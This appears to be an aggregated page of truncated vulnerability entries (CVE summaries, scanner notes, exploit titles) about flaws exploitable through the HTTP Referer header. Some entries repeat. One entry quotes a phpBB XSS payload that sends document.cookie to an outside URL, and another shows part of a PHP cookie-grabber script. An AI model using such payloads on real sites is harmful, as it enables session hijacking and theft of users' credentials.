CVE-2006-1787

Adobe Document Server for Reader Extensions 6.0 includes a user's session jsession ID in the HTTP Referer header, which allows remote attackers to gain access to PDF files that are being processed within that session...

CVE-2005-4711

SQL injection vulnerability in Neocrome Land Down Under LDU 801 allows remote attackers to execute arbitrary SQL commands via an HTTP Referer header. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

CVE-2005-4711

Neocrome Land Down Under (LDU) 801 is affected by CVE-2005-4711: SQL injection via input from the HTTP Referer header. The issue allows remote attackers to execute arbitrary SQL commands on the backend database. The Nessus NASL item for LDU_REFERER_SQL_INJECTION.NASL documents that input from the...

CVE-2006-0495

Cross-site scripting XSS vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB aka MyBulletinBoard 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header $url variable...

Cross site scripting

Cross-site scripting XSS vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB aka MyBulletinBoard 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header $url variable...

CVE-2006-0495

The CVE-2006-0495 entry concerns MyBB (MyBulletinBoard) 1.02. A Cross‑Site Scripting (XSS) flaw exists in the Add Thread to Favorites feature implemented in usercp2.php, exploitable via an HTTP Referer header (the $url variable). This allows remote attackers to inject arbitrary web script or HTML...

CVE-2006-0495

Cross-site scripting XSS vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB aka MyBulletinBoard 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header $url variable...

PHP-Nuke News Submission Story - Text Field Cross-Site Scripting

PHP-Nuke News Submission Story - Text Field Cross-Site Scripting source: https://www.securityfocus.com/bid/16192/info The PHPNuke Pool and News Modules are prone to an HTML injection vulnerability. This issue is due to a failure in the application modules to properly sanitize user-supplied input...

CVE-2005-4711

SQL injection vulnerability in Neocrome Land Down Under LDU 801 allows remote attackers to execute arbitrary SQL commands via an HTTP Referer header. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information...

phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure

/ phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0; X="' c.php: milw0rm.com 2005-12-21...

CVE-2005-4012

Multiple cross-site scripting XSS vulnerabilities in PHP Web Statistik 1.4 allows remote attackers to inject arbitrary web script or HTML via 1 the lastnumber parameter to stat.php and 2 the HTTP referer to pixel.php...

CVE-2005-3931

CVE-2005-3931 : A SQL injection flaw exists in default.asp of ASP-Rider 1.6 , allowing remote attackers to inject arbitrary SQL commands via the HTTP Referer. The vulnerability targets the input handling in that page/file, enabling unauthorized data access or manipulation as described in the publ...

CVE-2005-3931

SQL injection vulnerability in default.asp in ASP-Rider 1.6 allows remote attackers to execute arbitrary SQL commands via the HTTP referer...

CVE-2005-3931

SQL injection vulnerability in default.asp in ASP-Rider 1.6 allows remote attackers to execute arbitrary SQL commands via the HTTP referer...

Land Down Under HTTP Referer Header SQL Injection

The installed version of Land Down Under fails to sanitize input passed through the HTTP Referer header before using it in database queries. Provided PHP's 'magicquotesgpc' setting is disabled, an attacker can exploit this issue to manipulate database queries, possibly revealing sensitive...

phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)

No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=date"j F, Y, g:i a"; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP:...

CVE-2003-1186

Buffer overflow in TelCondex SimpleWebServer 2.12.30210 Build3285 allows remote attackers to execute arbitrary code via a long HTTP Referer header...

Mozilla OnUnload Referer Information Leakage Race Condition Information Disclosure (deprecated)

Binary data 1316.prm...

RHEL 2.1 : kdelibs (RHSA-2003:236)

This erratum provides updated KDE packages that resolve a security issue in Konquerer. KDE is a graphical desktop environment for the X Window System. Konqueror is the file manager for the K Desktop Environment. George Staikos reported that Konqueror may inadvertently send authentication...

CVE-2004-0259

The CVE affects Formmail.php version 5.0 and earlier, where check_referer() can be bypassed by an empty or spoofed HTTP Referer, enabling access restriction bypass. The vulnerability is demonstrated via an application on the same web server that contains an associated cross-site scripting (XSS) i...